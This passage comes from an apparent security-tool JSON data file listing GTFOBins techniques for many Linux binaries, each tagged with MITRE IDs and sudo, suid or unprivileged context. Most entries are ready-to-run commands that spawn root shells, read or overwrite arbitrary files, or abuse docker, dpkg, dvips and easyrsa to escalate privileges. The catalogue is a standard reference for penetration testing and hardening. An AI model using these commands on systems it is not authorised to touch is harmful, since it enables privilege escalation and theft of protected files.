Escalation"],"nativeCategory":["command"],"command":"dnsmasq --conf-script='/path/to/command 1>&2'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dnsmasq/"]},{"id":"gtfo:dnsmasq:command:0:suid","toolId":"gtfo:dnsmasq","toolName":"dnsmasq","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["command"],"command":"dnsmasq --conf-script='/path/to/command 1>&2'","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dnsmasq/"]},{"id":"gtfo:dnsmasq:command:0:unprivileged","toolId":"gtfo:dnsmasq","toolName":"dnsmasq","name":"command","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["command"],"command":"dnsmasq --conf-script='/path/to/command 1>&2'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dnsmasq/"]},{"id":"gtfo:doas:shell:0:sudo","toolId":"gtfo:doas","toolName":"doas","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"doas -u root /bin/sh","description":"The user must be allowed to use `doas`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/doas/"]},{"id":"gtfo:doas:shell:0:unprivileged","toolId":"gtfo:doas","toolName":"doas","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"doas -u root /bin/sh","description":"The user must be allowed to use `doas`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/doas/"]},{"id":"gtfo:docker:file-read:0:sudo","toolId":"gtfo:docker","toolName":"docker","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"docker cp /path/to/input-file $CONTAINER_ID:input-file\ndocker cp $CONTAINER_ID:input-file /path/to/temp-file\ncat /path/to/temp-file","description":"Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:file-read:0:suid","toolId":"gtfo:docker","toolName":"docker","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"docker cp /path/to/input-file $CONTAINER_ID:input-file\ndocker cp $CONTAINER_ID:input-file /path/to/temp-file\ncat /path/to/temp-file","description":"Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:file-read:0:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"docker cp /path/to/input-file $CONTAINER_ID:input-file\ndocker cp $CONTAINER_ID:input-file /path/to/temp-file\ncat /path/to/temp-file","description":"Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:file-write:0:sudo","toolId":"gtfo:docker","toolName":"docker","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ndocker cp /path/to/temp-file $CONTAINER_ID:temp-file\ndocker cp $CONTAINER_ID /path/to/output-file","description":"Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:file-write:0:suid","toolId":"gtfo:docker","toolName":"docker","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ndocker cp /path/to/temp-file $CONTAINER_ID:temp-file\ndocker cp $CONTAINER_ID /path/to/output-file","description":"Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:file-write:0:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"echo DATA >/path/to/temp-file\ndocker cp /path/to/temp-file $CONTAINER_ID:temp-file\ndocker cp $CONTAINER_ID /path/to/output-file","description":"Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:0:sudo","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:0:suid","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:0:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:1:sudo","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run --rm -it --privileged -u root alpine\nmount /dev/sda1 /mnt/\nls -la /mnt/\nchroot /mnt /bin/bash","description":"This exploits the fact that is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:1:suid","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"docker run --rm -it --privileged -u root alpine\nmount /dev/sda1 /mnt/\nls -la /mnt/\nchroot /mnt /bin/bash","description":"This exploits the fact that is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:docker:shell:1:unprivileged","toolId":"gtfo:docker","toolName":"docker","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"docker run --rm -it --privileged -u root alpine\nmount /dev/sda1 /mnt/\nls -la /mnt/\nchroot /mnt /bin/bash","description":"This exploits the fact that is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/docker/"]},{"id":"gtfo:dos2unix:file-read:0:sudo","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dos2unix -f -O /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dos2unix:file-read:0:suid","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dos2unix -f -O /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dos2unix:file-read:0:unprivileged","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dos2unix -f -O /path/to/input-file","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dos2unix:file-write:0:sudo","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dos2unix -f -n /path/to/input-file /path/to/output-file","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dos2unix:file-write:0:suid","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dos2unix -f -n /path/to/input-file /path/to/output-file","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dos2unix:file-write:0:unprivileged","toolId":"gtfo:dos2unix","toolName":"dos2unix","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dos2unix -f -n /path/to/input-file /path/to/output-file","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dos2unix/"]},{"id":"gtfo:dosbox:file-read:0:sudo","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'type c:\\path\\to\\input'","description":"The file content will be displayed in the DOSBox graphical window.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-read:0:suid","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'type c:\\path\\to\\input'","description":"The file content will be displayed in the DOSBox graphical window.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-read:0:unprivileged","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'type c:\\path\\to\\input'","description":"The file content will be displayed in the DOSBox graphical window.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-read:1:sudo","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'copy c:\\path\\to\\input c:\\path\\to\\output' -c exit\ncat /path/to/OUTPUT","description":"The file is copied to a readable location.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-read:1:suid","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'copy c:\\path\\to\\input c:\\path\\to\\output' -c exit\ncat /path/to/OUTPUT","description":"The file is copied to a readable location.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-read:1:unprivileged","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dosbox -c 'mount c /' -c 'copy c:\\path\\to\\input c:\\path\\to\\output' -c exit\ncat /path/to/OUTPUT","description":"The file is copied to a readable location.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-write:0:sudo","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dosbox -c 'mount c /' -c \"echo DATA >c:\\path\\to\\output\" -c exit","description":"Note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-write:0:suid","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"dosbox -c 'mount c /' -c \"echo DATA >c:\\path\\to\\output\" -c exit","description":"Note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dosbox:file-write:0:unprivileged","toolId":"gtfo:dosbox","toolName":"dosbox","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"dosbox -c 'mount c /' -c \"echo DATA >c:\\path\\to\\output\" -c exit","description":"Note that `echo` terminates the string with a DOS-style line terminator (`\\r\\n`), if that's a problem and your scenario allows it, you can create the file outside `dosbox`, then use `copy` to do the actual write.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dosbox/"]},{"id":"gtfo:dotnet:file-read:0:sudo","toolId":"gtfo:dotnet","toolName":"dotnet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"dotnet fsi\nSystem.IO.File.ReadAllText(\"/path/to/input-file\");;","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dotnet/"]},{"id":"gtfo:dotnet:file-read:0:unprivileged","toolId":"gtfo:dotnet","toolName":"dotnet","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"dotnet fsi\nSystem.IO.File.ReadAllText(\"/path/to/input-file\");;","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dotnet/"]},{"id":"gtfo:dotnet:shell:0:sudo","toolId":"gtfo:dotnet","toolName":"dotnet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dotnet fsi\nSystem.Diagnostics.Process.Start(\"/bin/sh\").WaitForExit();;","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dotnet/"]},{"id":"gtfo:dotnet:shell:0:unprivileged","toolId":"gtfo:dotnet","toolName":"dotnet","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dotnet fsi\nSystem.Diagnostics.Process.Start(\"/bin/sh\").WaitForExit();;","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dotnet/"]},{"id":"gtfo:dpkg:inherit:0:sudo","toolId":"gtfo:dpkg","toolName":"dpkg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dpkg -l","mitre":["T1059","T1005","T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dpkg/"]},{"id":"gtfo:dpkg:inherit:0:suid","toolId":"gtfo:dpkg","toolName":"dpkg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write","Privilege Escalation"],"nativeCategory":["inherit","from:less"],"command":"dpkg -l","mitre":["T1059","T1005","T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dpkg/"]},{"id":"gtfo:dpkg:inherit:0:unprivileged","toolId":"gtfo:dpkg","toolName":"dpkg","name":"inherit ← less","source":"GTFOBins","platform":["Linux"],"capability":["Execution","File Read","File Write"],"nativeCategory":["inherit","from:less"],"command":"dpkg -l","mitre":["T1059","T1005","T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dpkg/"]},{"id":"gtfo:dpkg:shell:0:sudo","toolId":"gtfo:dpkg","toolName":"dpkg","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dpkg -i x_1.0_all.deb","description":"Generate the Debian package with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n\n```\necho 'exec /bin/sh' >x.sh\nfpm -n x -s dir -t deb -a all --before-install x.sh .\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dpkg/"]},{"id":"gtfo:dstat:inherit:0:sudo","toolId":"gtfo:dstat","toolName":"dstat","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"dstat --xxx","description":"`dstat` allows you to run arbitrary Python scripts loaded as \"external plugins\" if they are located in one of the directories, stated in the `dstat` man page under \"FILES\":\n\n- `~/.dstat/`\n- `(path of binary)/plugins/`\n- `/usr/share/dstat/`\n- `/usr/local/share/dstat/`\n\nPick the one that you can write into. The plugin named `xxx` file name must be defined in the `dstat_xxx.py` file.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dstat/"]},{"id":"gtfo:dstat:inherit:0:unprivileged","toolId":"gtfo:dstat","toolName":"dstat","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"dstat --xxx","description":"`dstat` allows you to run arbitrary Python scripts loaded as \"external plugins\" if they are located in one of the directories, stated in the `dstat` man page under \"FILES\":\n\n- `~/.dstat/`\n- `(path of binary)/plugins/`\n- `/usr/share/dstat/`\n- `/usr/local/share/dstat/`\n\nPick the one that you can write into. The plugin named `xxx` file name must be defined in the `dstat_xxx.py` file.","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dstat/"]},{"id":"gtfo:dvips:shell:0:sudo","toolId":"gtfo:dvips","toolName":"dvips","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dvips -R0 texput.dvi","description":"The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.\n\n```\ntex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n```","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/dvips/"]},{"id":"gtfo:dvips:shell:0:suid","toolId":"gtfo:dvips","toolName":"dvips","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"dvips -R0 texput.dvi","description":"The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.\n\n```\ntex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n```","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/dvips/"]},{"id":"gtfo:dvips:shell:0:unprivileged","toolId":"gtfo:dvips","toolName":"dvips","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"dvips -R0 texput.dvi","description":"The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.\n\n```\ntex '\\special{psfile=\"`/bin/sh 1>&0\"}\\end'\n```","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/dvips/"]},{"id":"gtfo:easy_install:inherit:0:sudo","toolId":"gtfo:easy_install","toolName":"easy_install","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\neasy_install .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/easy_install/"]},{"id":"gtfo:easy_install:inherit:0:unprivileged","toolId":"gtfo:easy_install","toolName":"easy_install","name":"inherit ← python","source":"GTFOBins","platform":["Linux"],"capability":["File Download","File Read","File Write","Library Load","Reverse/Bind Shell","Execution","File Upload"],"nativeCategory":["inherit","from:python"],"command":"echo '...' >setup.py\neasy_install .","description":"This allows to run Python code (`...`). It executes a Python script named `setup.py` in the directory passed as argument (`.`).\n\nKeep in mind that the TTY is lost, so `/dev/tty` can be used, for example:\n\n```\necho 'import os; os.system(\"exec /bin/sh </dev/tty >/dev/tty 2>/dev/tty\")' >setup.py\n```","mitre":["T1105","T1005","T1565","T1574","T1059","T1071","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/easy_install/"]},{"id":"gtfo:easyrsa:shell:0:sudo","toolId":"gtfo:easyrsa","toolName":"easyrsa","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'set_var X \"$(/bin/sh 1>&0)\"' >/path/to/temp-file\neasyrsa --vars=/path/to/temp-file","description":"This command might not be in the `PATH`, it could be found in, `/usr/share/easy-rsa/easyrsa`. The shell is spawn twice.","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/easyrsa/"]},{"id":"gtfo:easyrsa:shell:0:suid","toolId":"gtfo:easyrsa","toolName":"easyrsa","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo 'set_var X \"$(/bin/sh 1>&0)\"' >/path/to/temp-file\neasyrsa --vars=/path/to/temp-file","description":"This command might not be in the `PATH`, it could be found in, `/usr/share/easy-rsa/easyrsa`. The shell is spawn twice.","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/easyrsa/"]},{"id":"gtfo:easyrsa:shell:0:unprivileged","toolId":"gtfo:easyrsa","toolName":"easyrsa","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo 'set_var X \"$(/bin/sh 1>&0)\"' >/path/to/temp-file\neasyrsa --vars=/path/to/temp-file","description":"This command might not be in the `PATH`, it could be found in, `/usr/share/easy-rsa/easyrsa`. The shell is spawn twice.","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/easyrsa/"]},{"id":"gtfo:eb:inherit:0:sudo","toolId":"gtfo:eb","toolName":"eb","name":"inherit ← journalctl","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["inherit"],"command":"eb logs","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/eb/"]},{"id":"gtfo:eb:inherit:0:unprivileged","toolId":"gtfo:eb","toolName":"eb","name":"inherit ← journalctl","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["inherit"],"command":"eb logs","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/eb/"]},{"id":"gtfo:ed:file-read:0:sudo","toolId":"gtfo:ed","toolName":"ed","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ed /path/to/input-file\n,p\nq","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:file-read:0:suid","toolId":"gtfo:ed","toolName":"ed","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"ed /path/to/input-file\n,p\nq","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:file-read:0:unprivileged","toolId":"gtfo:ed","toolName":"ed","name":"file-read","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"ed /path/to/input-file\n,p\nq","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:file-write:0:sudo","toolId":"gtfo:ed","toolName":"ed","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ed /path/to/output-file\na\nDATA\n.\nw\nq","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:file-write:0:suid","toolId":"gtfo:ed","toolName":"ed","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"ed /path/to/output-file\na\nDATA\n.\nw\nq","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:file-write:0:unprivileged","toolId":"gtfo:ed","toolName":"ed","name":"file-write","source":"GTFOBins","platform":["Linux","macOS"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"ed /path/to/output-file\na\nDATA\n.\nw\nq","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:shell:0:sudo","toolId":"gtfo:ed","toolName":"ed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ed\n!/bin/sh\nq","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:shell:0:suid","toolId":"gtfo:ed","toolName":"ed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"ed\n!/bin/sh\nq","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:ed:shell:0:unprivileged","toolId":"gtfo:ed","toolName":"ed","name":"shell","source":"GTFOBins","platform":["Linux","macOS"],"capability":["Execution"],"nativeCategory":["shell"],"command":"ed\n!/bin/sh\nq","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/ed/"]},{"id":"gtfo:efax:file-read:0:sudo","toolId":"gtfo:efax","toolName":"efax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"efax -d /path/to/input-file","description":"The content is actually parsed by the command.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/efax/"]},{"id":"gtfo:efax:file-read:0:suid","toolId":"gtfo:efax","toolName":"efax","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"efax -d /path/to/input-file","description":"The content is actually parsed by the command.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/efax/"]},{"id":"gtfo:egrep:file-read:0:sudo","toolId":"gtfo:egrep","toolName":"egrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/egrep/"]},{"id":"gtfo:egrep:file-read:0:suid","toolId":"gtfo:egrep","toolName":"egrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"grep '' /path/to/input-file","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/egrep/"]},{"id":"gtfo:egrep:file-read:0:unprivileged","toolId":"gtfo:egrep","toolName":"egrep","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"grep '' 